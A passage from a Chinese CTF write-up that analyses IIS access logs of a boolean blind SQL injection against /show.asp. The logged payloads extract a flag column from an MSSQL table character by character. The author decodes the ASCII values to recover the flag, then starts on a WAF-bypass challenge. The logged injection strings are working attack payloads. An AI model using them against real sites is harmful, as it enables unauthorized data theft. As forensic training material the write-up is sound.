2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>52|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>50|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),6,1))>49|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>64 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>96 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>112|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>104|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>100|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>98 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),7,1))>99 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>64|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>32 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>48 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>56|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>52 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>54|18|800a0bcd|BOF_或_EOF_中有一个是“真”,或者当前的记录已被删除,所需的操作要求一个当前的记录。 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 500 0 0
2015-10-21 09:32:36 W3SVC1 192.168.1.135 GET /show.asp id=2 AND UNICODE(SUBSTRING((SELECT MIN(ISNULL(CAST(theflag AS NVARCHAR(4000)),CHAR(32))) FROM tourdata.dbo.news WHERE CONVERT(NVARCHAR(4000),theflag)>CHAR(32)),8,1))>53 80 - 192.168.1.101 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1b4)+Gecko/20090423+Firefox/3.5b4+GTB5+(.NET+CLR+3.5.30729) 200 0 0

利用二分法一位一位分析,最后得到8位的ascii值

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
>>> chr(53)
'5'
>>> chr(50)
'2'
>>> chr(99)
'c'
>>> chr(53)
'5'
>>> chr(102)
'f'
>>> chr(49)
'1'
>>> chr(100)
'd'
>>> chr(54)
'6'
>>>

拼接得flag:52c5f1d6

花式绕waf

扫描后台得到www.zip文件,获得源代码,考察sql注入